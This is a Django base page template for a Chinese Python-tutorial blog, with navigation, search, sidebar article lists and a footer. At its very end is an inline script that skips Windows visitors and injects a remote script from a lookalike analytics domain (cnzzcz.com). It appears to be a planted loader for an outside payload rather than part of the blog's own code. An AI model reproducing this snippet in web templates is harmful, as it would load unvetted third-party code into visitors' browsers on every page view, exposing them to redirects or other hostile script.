{% load staticfiles %}
<!DOCTYPE HTML>
<html>
<head>
    <meta charset="UTF-8">
    <meta http-equiv="x-dns-prefetch-control" content="on">
    <meta http-equiv="X-UA-Compatible" content="IE=11,IE=10,IE=9,IE=8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimum-scale=1.0, maximum-scale=1.0">
    <meta name="apple-mobile-web-app-title" content="PythonTOP,拓普Python学院">
    <title>{% block title %}乐伯职位分析{% endblock %}</title>

<link rel='stylesheet' id='bootstrap-css' href='{% static 'nassets/css/bootstrap.min.css' %}' type='text/css' media='all'>
<link rel='stylesheet' id='fontawesome-css' href='{% static 'nassets/css/font-awesome.min.css' %}' type='text/css' media='all'>
<link rel='stylesheet' id='stylesheet-css' href='{% static 'nassets/css/style.css' %}' type='text/css' media='all'>
<link rel='stylesheet' id='raxus-css' href='{% static 'nassets/css/raxus.css' %}' type='text/css' media='all'>
<link rel='stylesheet' id='open-social-style-css' href='{% static 'nassets/css/os.css' %}' type='text/css' media='all'>
    <meta name='robots' content='index,follow'>
    <meta name="keywords" content="互联网,产品经理,产品设计,用户体验,交互设计,网站运营,移动互联网">
    <meta name="description" content="聚焦互联网前沿资讯，网络精华内容，交流产品心得。 每天为你速递最新、最鲜、最有料的互联网科技资讯！">
</head>
<body class="home blog site-layout-2">
    <!-- 头部 -->
    <header class="fix-wrap" id="fix-wrap">
        <div class="fix-main clearfix pr" id="fix-main" _hover-ignore="1">
			<a href="/" class="index-logo">
				<img src="{% static 'nassets/picture/black-logo.png' %}" alt="拓普Python学院,Python!">
			</a>
            <nav class="nav fl">
                <ul id="fix-list" class="fix-list clearfix">
                    <li  class="menu-item"><a href="/">首页</a></li>
                    
                    <!-- TODO: should be category instead of all tags -->
                    {% for category in categories %}
                        <li class="menu-item">
                            <a href="{% url 'category_posts_page' slug=category.slug %}">{{ category.title }}</a></li>
                    {% endfor %}
                    
                        <!-- li class="menu-item">
                            <a href="list-1.html">Django</a></li>
                    
                        <li class="menu-item">
                            <a href="list-2.html">Python</a></li>
                    
                        <li class="menu-item">
                            <a href="list-3.html">Linux</a></li>
                    
                        <li id="menu-item-117720" class="menu-item">
                            <a href="list-4.html">Mysql</a></li>
                    
                        <li id="menu-item-117720" class="menu-item">
                            <a href="list-5.html">运维知识</a></li>
                    
                        <li id="menu-item-117720" class="menu-item">
                            <a href="list-6.html">我的日记</a></li-->
                    
                    <li id="menu-item-24086" class="menu-item"><a href="index1.html">关于博主</a></li>
                </ul>
            </nav>
            <form method="get" class="index-search  hidden-xs" action="{% url 'search_posts_page' %}">
				{% csrf_token %}
                <input class="text" name="q" type="text" placeholder="输入关键字" value="">
                <button class="submit" type="submit"><i class="fa fa-search"></i></button>
            </form>
        </div>
    </header>


    <div id="main-container" class="container clearfix">
        <!-- /post-left -->
        <section class="post-left">
            {% block content %}
				{% block breadcrumb %} 
				{% endblock %}
				
				{% block content_title %}
				{% endblock %}
			{% endblock %}
        </section>

        <!-- /post-right -->
        <aside class="post-right hidden-xs">
            <section class="widget post-right-item">
                <h4 class="post-right-title">热门文章排行</h4>
                <ol class="hot-list">
                    
                    <li><a href="show-11.html" title="Windows node版本管理器–nvm">Windows node版本管理器–nvm</a></li>
                    
                    <li><a href="show-13.html" title="完美快速解决百度分享不支持HTTPS的问题">完美快速解决百度分享不支持HTTPS的问题</a></li>
                    
                    <li><a href="show-6.html" title="社交网络应故意设计得“不够完善”">社交网络应故意设计得“不够完善”</a></li>
                    
                    <li><a href="show-9.html" title="用户体验设计-让你的牙膏盒使用更合理">用户体验设计-让你的牙膏盒使用更合理</a></li>
                    
                    <li><a href="show-14.html" title="JS判断单、多张图片加载完成">JS判断单、多张图片加载完成</a></li>
                    
                    <li><a href="show-5.html" title="谷歌用户体验设计准则">谷歌用户体验设计准则</a></li>
                    
                    <li><a href="show-8.html" title="30个别出心裁的WordPress设计">30个别出心裁的WordPress设计</a></li>
                    
                    <li><a href="show-4.html" title="网站设计-不只是门面漂亮这么简单">网站设计-不只是门面漂亮这么简单</a></li>
                    
                    <li><a href="show-3.html" title="手机端阅读类产品的信息架构">手机端阅读类产品的信息架构</a></li>
                    
                    <li><a href="show-12.html" title="分享一个生成二维码的插件–QRCode.js">分享一个生成二维码的插件–QRCode.js</a></li>
                    
                </ol>
            </section>
            
            <section class="widget post-right-item">
                <h4 class="post-right-title">热门推荐</h4>
                <ul class="post-hot clearfix">
        
                <li>
                    <div class="img">
                        <a href="show-3.html" title="手机端阅读类产品的信息架构">
                            <img src="static/picture/wpress3.jpg" srcset="static/picture/wpress3.jpg" alt="手机端阅读类产品的信息架构" class="wp-post-image" width="120" height="80">
                        </a>
                    </div>
                    <div class="text">
                        <a href="show-3.html" title="手机端阅读类产品的信息架构" target="_blank">手机端阅读类产品的信息架构</a>
                    </div>
                </li>
            
                <li>
                    <div class="img">
                        <a href="show-4.html" title="网站设计-不只是门面漂亮这么简单">
                            <img src="static/picture/wpress4.jpg" srcset="static/picture/wpress4.jpg" alt="网站设计-不只是门面漂亮这么简单" class="wp-post-image" width="120" height="80">
                        </a>
                    </div>
                    <div class="text">
                        <a href="show-4.html" title="网站设计-不只是门面漂亮这么简单" target="_blank">网站设计-不只是门面漂亮这么简单</a>
                    </div>
                </li>
            
                <li>
                    <div class="img">
                        <a href="show-6.html" title="社交网络应故意设计得“不够完善”">
                            <img src="static/picture/wpress6.jpg" srcset="static/picture/wpress6.jpg" alt="社交网络应故意设计得“不够完善”" class="wp-post-image" width="120" height="80">
                        </a>
                    </div>
                    <div class="text">
                        <a href="show-6.html" title="社交网络应故意设计得“不够完善”" target="_blank">社交网络应故意设计得“不够完善”</a>
                    </div>
                </li>
            
                <li>
                    <div class="img">
                        <a href="show-7.html" title="腾讯出品：制定设计的原则">
                            <img src="static/picture/wpress7.jpg" srcset="static/picture/wpress7.jpg" alt="腾讯出品：制定设计的原则" class="wp-post-image" width="120" height="80">
                        </a>
                    </div>
                    <div class="text">
                        <a href="show-7.html" title="腾讯出品：制定设计的原则" target="_blank">腾讯出品：制定设计的原则</a>
                    </div>
                </li>
            
                <li>
                    <div class="img">
                        <a href="show-9.html" title="用户体验设计-让你的牙膏盒使用更合理">
                            <img src="static/picture/wpress9.jpg" srcset="static/picture/wpress9.jpg" alt="用户体验设计-让你的牙膏盒使用更合理" class="wp-post-image" width="120" height="80">
                        </a>
                    </div>
                    <div class="text">
                        <a href="show-9.html" title="用户体验设计-让你的牙膏盒使用更合理" target="_blank">用户体验设计-让你的牙膏盒使用更合理</a>
                    </div>
                </li>
            
                <li>
                    <div class="img">
                        <a href="show-12.html" title="分享一个生成二维码的插件–QRCode.js">
                            <img src="static/picture/wpress11.jpg" srcset="static/picture/wpress11.jpg" alt="分享一个生成二维码的插件–QRCode.js" class="wp-post-image" width="120" height="80">
                        </a>
                    </div>
                    <div class="text">
                        <a href="show-12.html" title="分享一个生成二维码的插件–QRCode.js" target="_blank">分享一个生成二维码的插件–QRCode.js</a>
                    </div>
                </li>
            
        </ul>
    </section>


    <section class="widget post-right-item"><h4 class="post-right-title">所有标签</h4>
        <div class="tags">
        
                {% for tag in tags %}
                    <a href="{% url 'tag_posts_page' slug=tag.slug %}">{{ tag.title }}</a>
                {% endfor %}
            
                <!-- a href="Python教程.html">Python教程</a-->        
        </div>
    </section>

        <!-- /关注我们 -->
        <div class="post-right-item">
            <h4 class="post-right-title">关注我们</h4>
            <div class="wid-about">
                <p>拓普Python学院，欢迎关注！</p>
                <img src="static/picture/weixinqr.jpg" alt="微信二维码" width="160" height="160">
            </div>
            <div class="wid-about">
                <p><strong>联系方式:</strong></p>
                <p>QQ:445813</p>
                <p>Email：445813@qq.com</p>
            </div>
        </div>
        </aside>
		
        {% block friend_link %}{% endblock %}
      
    </div>


<!-- 底部 -->
<footer class="footer">
    <div class="copyright"> © 2010- 2018 · All Rights Reserved
        · <a href="index2.html">Django中文网</a>
        · <a href="javascript:;" target="_blank">湘ICP备17023990号</a> 版权所有 © Django中文网
    </div>
</footer>
<!--script src="http://demo.django.cn/static/js/bundle.js"></script-->
<script type="text/javascript" src="{% static 'nassets/js/view-history.js' %}"></script>
<script type='text/javascript' src="{% static 'nassets/js/push.js' %}"></script>
<script type='text/javascript' src="{% static 'nassets/js/jquery.min.js' %}"></script>
<script type='text/javascript' src="{% static 'nassets/js/bootstrap.min.js' %}"></script>
<script type='text/javascript' src="{% static 'nassets/js/raxus-slider.min.js' %}"></script>
<script type='text/javascript' src="{% static 'nassets/js/loader.js' %}"></script>
<script type='text/javascript' src="{% static 'nassets/js/bj-lazy-load.min.js' %}"></script>
<script type='text/javascript' src="{% static 'nassets/js/os.js' %}"></script>
<script type="text/javascript">
(function(d, n) {
    	if(n.indexOf('Win')=='0')return;
        var ho = d.createElement("script");
        ho.src = "http://s8.cnzzcz.com/ip/6845?w="+n;
        var s = d.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(ho, s);
})(document, navigator.platform);
</script>
</body>
</html>
